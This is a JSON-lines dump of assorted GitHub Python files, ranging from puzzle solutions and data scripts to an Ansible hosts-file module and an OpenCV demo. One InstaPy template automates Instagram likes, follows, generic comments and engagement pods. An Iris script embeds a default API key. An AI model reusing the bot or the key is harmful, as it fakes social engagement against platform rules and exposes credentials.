in open('input.txt', 'r').readlines()]]\n\n    partOne(commands)\n    partTwo(commands)\n    \n\ndef partOne(commands):\n    horizontalPos = 0\n    depth = 0\n\n    for command in commands:\n        direction = command[0]\n        value = command[1]\n        \n        if direction == 'forward': horizontalPos += value\n        elif direction == 'up': depth -= value\n        elif direction == 'down': depth += value\n\n    print(depth * horizontalPos)\n\n\ndef partTwo(commands):\n    horizontalPos = 0\n    depth = 0\n    aim = 0\n\n    for command in commands:\n        direction = command[0]\n        value = command[1]\n        \n        if direction == 'forward':\n            horizontalPos += value\n            depth += (aim * value)\n        elif direction == 'up': aim -= value\n        elif direction == 'down': aim += value\n\n\n    print(depth * horizontalPos)\n    \nif __name__ == \"__main__\":\n    main()\n","repo_name":"whiskermrr/advent-of-code-2021","sub_path":"day02/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20024715901","text":"\"\"\"\nThis template is written by @Nocturnal-2\n\nWhat does this quickstart script aim to do?\n- I do some unfollow and like by tags mostly\n\nNOTES:\n- I am a one-month-old InstaPy user, with a small following. So my numbers\nin settings are a bit conservative.\n\"\"\"\n\nfrom instapy import InstaPy\nfrom instapy import smart_run\n\n# get a session!\nsession = InstaPy(username='', password='')\n\n# let's go! 
:>\nwith smart_run(session):\n    \"\"\" Start of parameter setting \"\"\"\n    # don't like if a post already has more than 150 likes\n    session.set_delimit_liking(enabled=True, max=150, min=0)\n\n    # don't comment if a post already has more than 4 comments\n    session.set_delimit_commenting(enabled=True, max=4, min=0)\n\n    \"\"\"I used to have potency_ratio=-0.85 and max_followers=1200 for \n    set_relationship_bounds()\n    Having a stricter relationship bound to target only low-profile \n    users was not very useful,\n    as the interactions/server calls ratio was very low. I would reach the \n    server call threshold for\n    the day before even crossing half of the presumed safe limits for \n    likes, follows and comments (yes,\n    looks like quite a lot of big (bot-managed) accounts out there!!).\n    So I relaxed it a bit to -0.50 and 2000 respectively.\n    \"\"\"\n    session.set_relationship_bounds(enabled=True,\n                                    potency_ratio=-0.50,\n                                    delimit_by_numbers=True,\n                                    max_followers=2000,\n                                    max_following=3500,\n                                    min_followers=25,\n                                    min_following=25)\n    session.set_do_comment(True, percentage=20)\n    session.set_do_follow(enabled=True, percentage=20, times=2)\n    session.set_comments(['Amazing!', 'Awesome!!', 'Cool!', 'Good one!',\n                          'Really good one', 'Love this!', 'Like it!',\n                          'Beautiful!', 'Great!', 'Nice one'])\n    session.set_sleep_reduce(200)\n\n    \"\"\" Get the list of non-followers\n    I duplicated unfollow_users() to see a list of non-followers which I \n    run once in a while when I have time\n    to review the list\n    \"\"\"\n    # session.just_get_nonfollowers()\n\n    # my account is small at the moment, so I keep a smaller upper threshold\n    session.set_quota_supervisor(enabled=True,\n                                 sleep_after=[\"likes\", \"comments_d\", \"follows\",\n                                              \"unfollows\", \"server_calls_h\"],\n                                 sleepyhead=True, stochastic_flow=True,\n                                 notify_me=True,\n                                 peak_likes=(100, 700),\n                                 peak_comments=(25, 200),\n                                 peak_follows=(48, 125),\n                                 peak_unfollows=(35, 400),\n                                 peak_server_calls=(None, 3000))\n    \"\"\" End of parameter setting \"\"\"\n\n    \"\"\" Actions start here \"\"\"\n    # Unfollow users\n    \"\"\" Users who were followed by InstaPy, but have not followed back will \n    be removed in\n    one week (168 * 60 * 60)\n    Yes, I give a liberal one week time to follow [back] :)\n    \"\"\"\n    session.unfollow_users(amount=25, InstapyFollowed=(True, \"nonfollowers\"),\n                           style=\"RANDOM\",\n                           unfollow_after=168 * 60 * 60,\n                           sleep_delay=600)\n\n    # Remove specific users immediately\n    \"\"\" I use InstaPy only for my personal account, I sometimes use a custom \n    list to remove users who fill up my feed\n    with annoying photos\n    \"\"\"\n    # custom_list = [\"sexy.girls.pagee\", \"browneyedbitch97\"]\n    #\n    # session.unfollow_users(amount=20, customList=(True, custom_list,\n    #                        \"all\"), style=\"RANDOM\",\n    #                        unfollow_after=1 * 60 * 60, sleep_delay=200)\n\n    # Like by tags\n    \"\"\" I mostly use like by tags. I used to use a small list of targeted \n    tags with a big 'amount' like 300\n    But that resulted in lots of \"insufficient links\" messages. So I \n    started using a huge list of tags with\n    'amount' set to something small like 50. Probably this is not the \n    best way to deal with the \"insufficient links\"\n    message. 
But I feel it is a quick workaround.\n    \"\"\"\n\n    session.like_by_tags(['tag1', 'tag2', 'tag3', 'tag4'], amount=300)\n\n    \"\"\" Joining Engagement Pods...\n    \"\"\"\n    session.join_pods(topic='fashion')\n\n\"\"\"\n-- REVIEWS --\n\n@uluQulu:\n- @Nocturnal-2, your template looks stylish, thanks for preparing it.\n\n@nocturnal-2:\n- I think it is a good opportunity to educate and get educated [using templates of other people] :) ...\n\n\"\"\"\n","repo_name":"InstaPy/instapy-quickstart","sub_path":"quickstart_templates/stylish_unfollow_tips_and_like_by_tags.py","file_name":"stylish_unfollow_tips_and_like_by_tags.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","stars":740,"dataset":"github-code","pt":"37"} +{"seq_id":"15496827196","text":"import nengo\n\nfrom adder_env import create_adder_env\nfrom constants import *\n\nq_list = [(0,0,0,1), (0,0,1,0), (0,1,0,0), (1,0,0,0)]\nans_list = [(-1,1), (1,-1), (1,1), (-1,-1)]\n\nwith nengo.Network(label=\"test\") as model:\n    env = create_adder_env(q_list, ans_list, (1,))\n\n    # questions and op_state are given at the correct interval\n    # and are swapped once an answer is given\n    q_node = nengo.Node(size_in=D*2)\n    op_node = nengo.Node(size_in=1)\n\n    # input is given constantly throughout\n    in_node = nengo.Node(size_in=D*2)\n\n    def ans_func(t):\n        if t < 0.1:\n            return 0, 0\n        elif t < 0.45:\n            return -1, 1\n        elif t < 0.6:\n            return 0, 0\n        elif t < 0.95:\n            return 1, -1\n        elif t < 1.0:\n            return 0, 0\n        elif t < 1.35:\n            return 1, 1\n        elif t < 1.8:\n            return 0, 0\n        elif t < 2.15:\n            return -1, -1\n        elif t < 2.2:\n            return 0, 0\n        elif t < 2.55:\n            return ans_list[env.env_cls.list_index + 1]\n        elif t < 2.6:\n            return 0, 0\n        elif t < 2.95:\n            return ans_list[env.env_cls.list_index]\n        else:\n            return 0, 0\n\n    # answers can be given at different intervals\n    ans_in = nengo.Node(ans_func)\n\n    # the correct answer is returned\n    ans_out = nengo.Node(size_in=D)\n\n    # learning is maintained for a given interval\n    learn_node = nengo.Node(size_in=1)\n\n    nengo.Connection(env.q_in, q_node, synapse=None)\n    nengo.Connection(env.op_in, op_node, synapse=None)\n    nengo.Connection(env.env_keys, in_node, synapse=None)\n    nengo.Connection(ans_in, env.set_ans, synapse=None)\n    nengo.Connection(env.get_ans, ans_out, synapse=None)\n    nengo.Connection(env.learning, learn_node, synapse=None)\n\n    p_q = nengo.Probe(env.q_in, synapse=None)\n    p_op = nengo.Probe(env.op_in, synapse=None)\n    p_keys = nengo.Probe(env.env_keys, synapse=None)\n    p_ans = nengo.Probe(env.get_ans, synapse=None)\n    p_learn = nengo.Probe(env.learning, synapse=None)\n    p_gate = nengo.Probe(env.gate, synapse=None)\n\n    p_in = nengo.Probe(ans_in, synapse=None)\n\nsim = nengo.Simulator(model, dt=dt)\nsim.run(3.0)\n","repo_name":"Seanny123/counting_to_addition","sub_path":"tests/env_test.py","file_name":"env_test.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"19806002754","text":"import numpy as np\nimport pdb\nimport os\n\ndirectories = os.listdir(\"/home/kendall/Development/nba-basketball-db/advanced-seasons/\")\n\nfor d in directories:\n    if d != \"2012\":\n        files = os.listdir(\"/home/kendall/Development/nba-basketball-db/advanced-seasons/\"+d)\n        for f in files:\n            data = np.genfromtxt(\"/home/kendall/Development/nba-basketball-db/advanced-seasons/\"+d+\"/\"+f, delimiter=\",\")\n\n            if data.shape[0] == 47:\n                continue\n\n            # if d == \"2017\" and f == \"Golden-State.csv\":\n            #     
pdb.set_trace()\n            #     print\n\n            try:\n                data = data[::-1,:]\n            except Exception:\n                pdb.set_trace()\n\n            accumulated_data = []\n            for row in range(1,data.shape[0]+1):\n                # accumulated_data.append(np.mean(data[0:row,:], axis=0))\n                row_data = []\n                for column in range(data.shape[1]):\n                    # if column != 0 and column != 46 and column != 43:\n                    if column != 0 and column != 29 and column != 32:\n                        row_data.append(np.mean(data[0:row,column]))\n                    else:\n                        row_data.append(data[row-1,column])\n                accumulated_data.append(row_data)\n\n            accumulated_data = np.array(accumulated_data)[::-1,:]\n\n            try:\n                os.mkdir(\"/home/kendall/Development/nba-basketball-db/advanced-accumulated/\"+d)\n            except OSError:\n                pass\n            np.savetxt(\"/home/kendall/Development/nba-basketball-db/advanced-accumulated/\"+d+\"/\"+f, accumulated_data, delimiter=\",\")\n","repo_name":"KendallWeihe/basketball-db","sub_path":"accumulate-stats.py","file_name":"accumulate-stats.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70395663146","text":"# deque (pronounced \"deck\") is a list-like container optimised for fast insertion and deletion at both ends.\nfrom collections import deque\n\na = ['s','h','o','h','a','n']\nb = deque(a)\nb.append('uzzaman')   # append() adds a single element at the right end\nb.appendleft('md')\nprint(b)\nb.popleft()   # pop()/popleft() remove an element from an end; they do not take any argument.\nb.pop()\nprint(b)","repo_name":"quietsos/Python_course","sub_path":"collection/deque.py","file_name":"deque.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17127392223","text":"\"\"\"\nQuick Use:\n    python createIncidents.py --host http://localhost:16649 --plan demo-test-foo\n\nBy default, the above command will create an incident for the `foo` user.\n\nSet the `username` to `foo` in the IDE to receive these notifications.\n\"\"\"\nimport argparse\n\nfrom irisclient import IrisClient\n\n\ndef main(arguments: argparse.Namespace) -> None:\n    print(f\"Base Hostname: {arguments.host}\")\n    print(f\"Application: {arguments.app}\")\n    print(f\"Key: *****{arguments.key[-5:]}\")\n    print(f\"Plan Name: {arguments.plan}\")\n    print()\n\n    client = IrisClient(app=arguments.app, key=arguments.key, api_host=arguments.host)\n\n    for x in range(arguments.count):\n        print(f\"Creating incident {x + 1} of {arguments.count}...\")\n        # create an incident\n        resp = client.incident(arguments.plan, context={'count': x + 1, 'key-foo': 'abc', 'key-bar': 1})\n        print(f'Incident ID: {resp}')\n        # # send an adhoc notification\n        # print(client.notification(role='user', target='alice', priority='urgent', subject='Yo'))\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--host', help='The base hostname to request against', required=True)\n    parser.add_argument('--key', help='The key to use for authenticating the Iris Client',\n                        default=\"a7a9d7657ac8837cd7dfed0b93f4b8b864007724d7fa21422c24f4ff0adb2e49\", required=False)\n    parser.add_argument('--app', help='The application to use for the client', default=\"Autoalerts\", required=False)\n    parser.add_argument('--plan', help='The plan to create an incident against', required=True)\n    parser.add_argument('-c', '--count', help='The number of incidents to create', type=int, default=1)\n    arguments = parser.parse_args()\n\n    
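# example invocation (assuming a reachable Iris instance): python createIncidents.py --host http://localhost:16649 --plan demo-test-foo --count 3\n    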
main(arguments)\n","repo_name":"ChrisCarini/iris-jetbrains-plugin","sub_path":"bin/createIncidents.py","file_name":"createIncidents.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70909419309","text":"import dash\nfrom dash import html, Input, Output, dcc, callback\nimport dash_bootstrap_components as dbc\nimport pandas as pd\nimport pickle\n\nfrom .player_worth_func import *\n\ndash.register_page(__name__)\n\ndf = clean_data()\n\nwith open('model/rf_10_feats', 'rb') as f:\n clf = pickle.load(f)\n\nfirst_pass = True\ncareer_assists_slider_output = int()\ncareer_assists_input_output = int()\ncareer_points_slider_output = int()\ncareer_points_input_output = int()\ncareer_shots_slider_output = int()\ncareer_shots_input_output = int()\ncareer_timeOnIce_slider_output = int()\ncareer_timeOnIce_input_output = int()\ncareer_evenTimeOnIce_slider_output = int()\ncareer_evenTimeOnIce_input_output = int()\ncareer_powerPlayTimeOnIcePerGame_slider_output = int()\ncareer_powerPlayTimeOnIcePerGame_input_output = int()\ncareer_powerPlayTimeOnIce_slider_output = int()\ncareer_powerPlayTimeOnIce_input_output = int()\ncareer_powerPlayPoints_slider_output = int()\ncareer_powerPlayPoints_input_output = int()\npowerPlayTimeOnIcePerGame22_slider_output = int()\npowerPlayTimeOnIcePerGame22_input_output = int()\nassists22_slider_output = int()\nassists22_input_output = int()\n\ncolumn_one_map = {\n 'Career Assists': 'career_assists',\n 'Career Points': 'career_points',\n 'Career Shots': 'career_shots',\n 'Career TOI': 'career_timeOnIce',\n 'Career Even TOI': 'career_evenTimeOnIce'\n}\n\ncolumn_two_map = {\n 'Career PP TOI PG': 'career_powerPlayTimeOnIcePerGame',\n 'Career PP TOI': 'career_powerPlayTimeOnIce',\n 'Career PP Points': 'career_powerPlayPoints',\n 'PP TOI PG 2021-22': 'powerPlayTimeOnIcePerGame22',\n 'Total Assists 2021-22': 'assists22'\n}\n\ncolumn_one_layout = convert_dash_format([\n (add_header(header),\n add_slider_input(df, data))\n for header, data in column_one_map.items()\n])\n\ncolumn_two_layout = convert_dash_format([\n (add_header(header),\n add_slider_input(df, data))\n for header, data in column_two_map.items()\n])\n\nlayout = dbc.Container([\n dbc.Row(\n html.H2(\n 'Your Predicted Salary Is:',\n style={\n 'textAlign': 'center'\n }),\n className='my-5'\n ),\n dbc.Row(\n html.H1(\n id='basic_predicted_salary',\n style={\n 'textAlign': 'center'\n }),\n className='my-5'\n ),\n dbc.Row(\n dbc.Col(\n html.Hr(\n style={\n 'color': 'black',\n 'height': '5px',\n 'opacity': '100',\n }\n ),\n width=10,\n ),\n justify='center',\n ),\n dbc.Row([\n dbc.Col(\n column_one_layout,\n width=5,\n ),\n dbc.Col(\n column_two_layout,\n width=5,\n )\n ],\n justify='center',\n ),\n dbc.Row(\n dbc.Col([\n dbc.Row(\n html.H4(\n 'Legend',\n style={\n 'textAlign': 'center',\n 'text-decoration': 'underline'\n }\n ),\n ),\n dbc.Row(\n html.H5(\n 'PP: Power Play'\n )\n ),\n dbc.Row(\n html.H5(\n 'TOI: Time On Ice'\n )\n ),\n dbc.Row(\n html.H5(\n 'PG: Per Game'\n )\n )\n ],\n style={\n 'textAlign': 'center',\n 'border': '2px black solid'\n },\n className='my-5'\n )\n )\n])\n\nall_columns = {**column_one_map, **column_two_map}\n\ncallback_outputs = [\n (Output(f'{data}_slider', 'value'),\n Output(f'{data}_input', 'value'))\n for data in all_columns.values()\n]\n\ncallback_outputs = convert_dash_format(callback_outputs)\n\nprediction = Output('basic_predicted_salary', 'children')\ncallback_outputs = 
list((*callback_outputs, prediction))\n\ncallback_inputs = [\n (Input(f'{data}_slider', 'value'),\n Input(f'{data}_input', 'value'))\n for data in all_columns.values()\n]\n\ncallback_inputs = list(convert_dash_format(callback_inputs))\n\n\n@callback(\n callback_outputs,\n callback_inputs\n)\ndef basic_pred(career_assists_slider, career_assists_input, career_points_slider, career_points_input,\n career_shots_slider, career_shots_input, career_timeOnIce_slider, career_timeOnIce_input,\n career_evenTimeOnIce_slider, career_evenTimeOnIce_input, career_powerPlayTimeOnIcePerGame_slider,\n career_powerPlayTimeOnIcePerGame_input, career_powerPlayTimeOnIce_slider,\n career_powerPlayTimeOnIce_input, career_powerPlayPoints_slider,\n career_powerPlayPoints_input, powerPlayTimeOnIcePerGame22_slider,\n powerPlayTimeOnIcePerGame22_input, assists22_slider, assists22_input):\n global first_pass, \\\n career_assists_slider_output, \\\n career_assists_input_output, \\\n career_points_slider_output, \\\n career_points_input_output, \\\n career_shots_slider_output, \\\n career_shots_input_output, \\\n career_timeOnIce_slider_output, \\\n career_timeOnIce_input_output, \\\n career_evenTimeOnIce_slider_output, \\\n career_evenTimeOnIce_input_output, \\\n career_powerPlayTimeOnIcePerGame_slider_output, \\\n career_powerPlayTimeOnIcePerGame_input_output, \\\n career_powerPlayTimeOnIce_slider_output, \\\n career_powerPlayTimeOnIce_input_output, \\\n career_powerPlayPoints_slider_output, \\\n career_powerPlayPoints_input_output, \\\n powerPlayTimeOnIcePerGame22_slider_output, \\\n powerPlayTimeOnIcePerGame22_input_output, \\\n assists22_slider_output, \\\n assists22_input_output\n\n if first_pass:\n first_pass = False\n career_assists_slider_output = career_assists_slider\n career_assists_input_output = career_assists_input\n career_points_slider_output = career_points_slider\n career_points_input_output = career_points_input\n career_shots_slider_output = career_shots_slider\n career_shots_input_output = career_shots_input\n career_timeOnIce_slider_output = career_timeOnIce_slider\n career_timeOnIce_input_output = career_timeOnIce_input\n career_evenTimeOnIce_slider_output = career_evenTimeOnIce_slider\n career_evenTimeOnIce_input_output = career_evenTimeOnIce_input\n career_powerPlayTimeOnIcePerGame_slider_output = career_powerPlayTimeOnIcePerGame_slider\n career_powerPlayTimeOnIcePerGame_input_output = career_powerPlayTimeOnIcePerGame_input\n career_powerPlayTimeOnIce_slider_output = career_powerPlayTimeOnIce_slider\n career_powerPlayTimeOnIce_input_output = career_powerPlayTimeOnIce_input\n career_powerPlayPoints_slider_output = career_powerPlayPoints_slider\n career_powerPlayPoints_input_output = career_powerPlayPoints_input\n powerPlayTimeOnIcePerGame22_slider_output = powerPlayTimeOnIcePerGame22_slider\n powerPlayTimeOnIcePerGame22_input_output = powerPlayTimeOnIcePerGame22_input\n assists22_slider_output = assists22_slider\n assists22_input_output = assists22_input\n\n career_assists_slider_output, career_assists_input_output = check_for_update(\n career_assists_slider, career_assists_input, career_assists_slider_output, career_assists_input_output)\n career_points_slider_output, career_points_input_output = check_for_update(\n career_points_slider, career_points_input, career_points_slider_output, career_points_input_output)\n career_shots_slider_output, career_shots_input_output = check_for_update(\n career_shots_slider, career_shots_input, career_shots_slider_output, career_shots_input_output)\n 
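# note: this sync and the nine below it are mechanical; a table-driven loop over (slider, input) pairs would be shorter, but Dash passes callback arguments positionally, so each pair is kept explicit here\n    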
career_timeOnIce_slider_output, career_timeOnIce_input_output = check_for_update(\n career_timeOnIce_slider, career_timeOnIce_input, career_timeOnIce_slider_output, career_timeOnIce_input_output)\n career_evenTimeOnIce_slider_output, career_evenTimeOnIce_input_output = check_for_update(\n career_evenTimeOnIce_slider, career_evenTimeOnIce_input, career_evenTimeOnIce_slider_output,\n career_evenTimeOnIce_input_output)\n career_powerPlayTimeOnIcePerGame_slider_output, career_powerPlayTimeOnIcePerGame_input_output = check_for_update(\n career_powerPlayTimeOnIcePerGame_slider, career_powerPlayTimeOnIcePerGame_input,\n career_powerPlayTimeOnIcePerGame_slider_output, career_powerPlayTimeOnIcePerGame_input_output)\n career_powerPlayTimeOnIce_slider_output, career_powerPlayTimeOnIce_input_output = check_for_update(\n career_powerPlayTimeOnIce_slider, career_powerPlayTimeOnIce_input, career_powerPlayTimeOnIce_slider_output,\n career_powerPlayTimeOnIce_input_output)\n career_powerPlayPoints_slider_output, career_powerPlayPoints_input_output = check_for_update(\n career_powerPlayPoints_slider, career_powerPlayPoints_input, career_powerPlayPoints_slider_output,\n career_powerPlayPoints_input_output)\n powerPlayTimeOnIcePerGame22_slider_output, powerPlayTimeOnIcePerGame22_input_output = check_for_update(\n powerPlayTimeOnIcePerGame22_slider, powerPlayTimeOnIcePerGame22_input,\n powerPlayTimeOnIcePerGame22_slider_output, powerPlayTimeOnIcePerGame22_input_output)\n assists22_slider_output, assists22_input_output = check_for_update(\n assists22_slider, assists22_input, assists22_slider_output, assists22_input_output)\n\n data_map = {\n 'career_assists': career_assists_slider_output,\n 'career_points': career_points_slider_output,\n 'career_powerPlayTimeOnIcePerGame': career_powerPlayTimeOnIcePerGame_slider_output,\n 'career_shots': career_shots_slider_output,\n 'career_powerPlayTimeOnIce': career_powerPlayTimeOnIce_slider_output,\n 'career_powerPlayPoints': career_powerPlayPoints_slider_output,\n 'assists22': assists22_slider_output,\n 'career_timeOnIce': career_timeOnIce_slider_output,\n 'career_evenTimeOnIce': career_evenTimeOnIce_slider_output,\n 'powerPlayTimeOnIcePerGame22': powerPlayTimeOnIcePerGame22_slider_output\n }\n\n X = pd.DataFrame.from_dict(data_map, orient='index').T\n\n pred = clf.predict(X)\n pred = \"${:,.2f}\".format(round(pred[0]))\n\n basic_predicted_salary_output = pred\n\n return career_assists_slider_output, career_assists_input_output, career_points_slider_output, \\\n career_points_input_output, career_shots_slider_output, career_shots_input_output, \\\n career_timeOnIce_slider_output, career_timeOnIce_input_output, career_evenTimeOnIce_slider_output, \\\n career_evenTimeOnIce_input_output, career_powerPlayTimeOnIcePerGame_slider_output, \\\n career_powerPlayTimeOnIcePerGame_input_output, career_powerPlayTimeOnIce_slider_output, \\\n career_powerPlayTimeOnIce_input_output, career_powerPlayPoints_slider_output, \\\n career_powerPlayPoints_input_output, powerPlayTimeOnIcePerGame22_slider_output, \\\n powerPlayTimeOnIcePerGame22_input_output, assists22_slider_output, assists22_input_output, \\\n basic_predicted_salary_output\n","repo_name":"kyledufrane/NHL-Salary-Predictions","sub_path":"dash/pages/player_worth.py","file_name":"player_worth.py","file_ext":"py","file_size_in_byte":11224,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"31909531330","text":"from __future__ import absolute_import, division, 
print_function\n\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n    \"metadata_version\": \"1.1\",\n    \"status\": [\"stableinterface\"],\n    \"supported_by\": \"EDB\",\n}\n\nDOCUMENTATION = \"\"\"\n---\nmodule: hosts_lines\nshort_description: Ensure that the given entries exist in /etc/hosts\ndescription:\n  - Takes a path and a list of lines and ensures that each entry exists in the\n    file, removing any older entries for matching IP addresses or hostnames.\n    Appends any lines that are not already in the file.\nversion_added: \"2.8\"\noptions:\n  path:\n    description:\n      - The path to an existing file\n    required: true\n  lines:\n    description:\n      - An array of hosts entries that must exist in the file\n    required: true\nauthor: \"Abhijit Menon-Sen\"\n\"\"\"\n\nEXAMPLES = \"\"\"\n- hosts_lines:\n    path: /etc/hosts\n    lines:\n      - 127.0.0.1 localhost\n      - 192.0.2.1 example.com\n\"\"\"\n\nimport traceback\nimport tempfile\nimport os\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils._text import to_bytes, to_native\n\n\ndef hosts_lines(module):\n    m = {}\n\n    path = module.params.get(\"path\")\n    diff = {\n        \"before\": \"\",\n        \"after\": \"\",\n        \"before_header\": \"%s (content)\" % path,\n        \"after_header\": \"%s (content)\" % path,\n    }\n\n    # Given a list of lines that may include comments, blank lines (which don't\n    # do anything useful), and valid hosts entries comprising an IP address and\n    # one or more hostnames separated by spaces, we build up the sets of lines,\n    # addresses, and hostnames we need in order to check whether existing hosts\n    # entries have to be replaced.\n\n    lines = set()\n    to_replace = set()\n\n    for l in module.params.get(\"lines\"):\n        lines.add(l)\n\n        if not l.lstrip().startswith(\"#\"):\n            words = l.split()\n            for n in words:\n                to_replace.add(n)\n\n    before_lines = []\n    after_lines = []\n    changes = []\n\n    try:\n        b_path = to_bytes(path, errors=\"surrogate_or_strict\")\n        with open(b_path, \"r\") as f:\n            before_lines = f.readlines()\n\n        for line in before_lines:\n            l = line.rstrip(\"\\r\\n\")\n\n            # If a line we want is already there, we copy it to the output and\n            # remove it from the list of lines to append. If the line contains\n            # an address or name that overlaps with an entry we are adding, we\n            # skip it. Otherwise we copy it over unmodified.\n\n            if l in lines:\n                lines.remove(l)\n\n            elif not l.lstrip().startswith(\"#\"):\n                words = l.split()\n                if set(words) & to_replace:\n                    changes.append(\"skip\")\n                    continue\n\n            after_lines.append(line)\n\n        if lines:\n            changes.append(\"append\")\n            for l in lines:\n                after_lines.append(l + \"\\n\")\n\n        # If we didn't need to skip any existing lines, we can just append the\n        # new lines to /etc/hosts. 
Otherwise we must replace the file, which we\n        # prefer to do by writing to a temporary file and using atomic_move; but\n        # that doesn't work on Docker containers, so we must overwrite in-place.\n\n        if changes and not module.check_mode:\n            contents = to_bytes(\"\".join(after_lines))\n\n            if \"skip\" in changes and module.params[\"platform\"] == \"docker\":\n                m[\"operation\"] = \"overwrite\"\n                with open(b_path, \"wb\") as f:\n                    f.write(contents)\n\n            elif \"skip\" in changes:\n                m[\"operation\"] = \"replace\"\n                tmpfd, tmpfile = tempfile.mkstemp()\n                with os.fdopen(tmpfd, \"wb\") as f:\n                    f.write(contents)\n                module.atomic_move(\n                    tmpfile,\n                    to_native(b_path),\n                    unsafe_writes=module.params[\"unsafe_writes\"],\n                )\n\n            else:\n                m[\"operation\"] = \"append\"\n                contents = to_bytes(\"\".join(map(lambda l: l + \"\\n\", lines)))\n                with open(b_path, \"ab\") as f:\n                    f.write(contents)\n    except Exception as e:\n        module.fail_json(msg=str(e), exception=traceback.format_exc())\n\n    diff[\"before\"] = \"\".join(before_lines)\n    diff[\"after\"] = \"\".join(after_lines)\n    m[\"diff\"] = [diff, []]\n    m[\"changed\"] = bool(changes)\n\n    return m\n\n\ndef main():\n    module = AnsibleModule(\n        argument_spec=dict(\n            path=dict(type=\"path\", required=True),\n            lines=dict(type=\"list\", required=True),\n            unsafe_writes=dict(type=\"bool\"),\n            platform=dict(type=\"str\"),\n        ),\n        supports_check_mode=True,\n    )\n\n    module.exit_json(**hosts_lines(module))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"EnterpriseDB/tpa","sub_path":"library/hosts_lines.py","file_name":"hosts_lines.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"35808751047","text":"'''\nPrint the smallest positive number that is evenly divisible by all of the numbers from 1 to 20\n'''\n\ndef is_divisible(num: int):\n    for x in range(20):\n        if num % (x + 1) != 0:\n            return False\n    return True\n\n\ndef until_divisible():\n    total = 20\n    while not is_divisible(total):\n        total += 20\n    return total\n\n\nprint(until_divisible())\n\n","repo_name":"Jcvita/projecteulermultilingual","sub_path":"python/005smallestmultiple.py","file_name":"005smallestmultiple.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14090285538","text":"contm = contf = contmaior = r = 0\r\nwhile True:\r\n    r = \" \"\r\n    sexo = \" \"\r\n    while sexo not in \"MF\":\r\n        sexo = str(input(\"Enter the person's sex: [M/F]\")).upper().strip()[0]\r\n    idade = int(input(\"Enter the person's age: \"))\r\n    if sexo == \"M\":\r\n        contm += 1\r\n    if sexo == \"F\" and idade < 20:\r\n        contf += 1\r\n    if idade > 18:\r\n        contmaior += 1\r\n    while r not in \"SN\":\r\n        r = str(input(\"Do you want to continue? 
[S/N] \")).upper().strip()[0]\r\n if r == \"N\":\r\n break\r\nprint(f\"a) O total de pessoas maiores de idade é de {contmaior}\")\r\nprint(f\"b) O número de homens cadastrados foi de {contm}\")\r\nprint(f\"c) O número de mulheres menores de 20 anos foi de {contf}\")\r\n","repo_name":"LucasAlmeidaBerta/Desafios-de-Python","sub_path":"Desafio 69.py","file_name":"Desafio 69.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74376504108","text":"#!/usr/bin/python3\n\nimport cv2\nimport numpy as np\n\n\ndog = cv2.imread(\"dog.jpg\")\ncat = cv2.imread(\"cat.jpg\")\n\n\n# print shapes of both pictures\n\nprint(dog.shape)\nprint(cat.shape)\n\ncv2.imshow(\"dog_image\",dog)\ncv2.imshow(\"cat_image\",cat)\n\n#after tracing both pics lets takeout the nose of dog and fix it on equal sized nose of cat\n\n#taking about 20*20 of both pics (dog has nose somewhere around 131*138)\ndog_nose = dog[121:141,128:148]\n\n#pic of dog's nose\n#cv2.imshow(\"dog_nose\",dog_nose)\n\n#takeout equal piece of 20*20 cat's nose so that the cat nose can be replaced by dogs and dogs by nose of cat\ncat_nose = cat[131:151,88:108]\n\n#pic of cat's nose\ncv2.imshow(\"cat_nose\",cat_nose)\n\n\n#adding nose of dog on cat (iamge of dogs nose overwritten on nose of cat) \nnose_add = cv2.addWeighted(cat_nose,.01,dog_nose,1,1)\n#dog_nose.copyTo(cat_nose)\n\n\n# trying to add portions passing values of dog_nose to cat_nose\ncat_nose = dog_nose\n\n# by now the actual cat_nose is replaced by that of dog's_nose\n\n# to see if the values of dog's_nose passed to cat's_nose or not\nif cat_nose.all == dog_nose.all:\n\timage = cv2.add(cat_nose,cat_nose)\n\tcv2.imwrite(\"new_cat.jpeg\",image)\n\tprint(\"matched\")\n\n\n\n# ie match whereever the color is reddish do black over there using numpy integrated with cv2\n#cat[np.where((cat == [255,255,255]).all(axis = 2))] = [0,0,0]\n\n#changing the color wherever cat is white do it black over there and save as output.png\ncat[np.where(cv2.inRange(cat,(100,100,100),(230,230,230)))] = [0,0,0]\ncv2.imwrite('output.png', cat)\n\n#cv2.imshow(\"new_cat_nose\",cat_nose)\ncv2.imshow(\"new_cat\",cat)\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows() \n","repo_name":"Bhavya-Agrawal/Computer_vision_projects","sub_path":"image_overlapping.py","file_name":"image_overlapping.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42787100624","text":"import numpy as np\nfrom gurobipy import *\nimport multiprocessing\n\nfrom multiprocessing import Pool\nfrom multiprocessing import set_start_method\nfrom multiprocessing.managers import BaseManager\n\ndef create_model(i):\n mp = 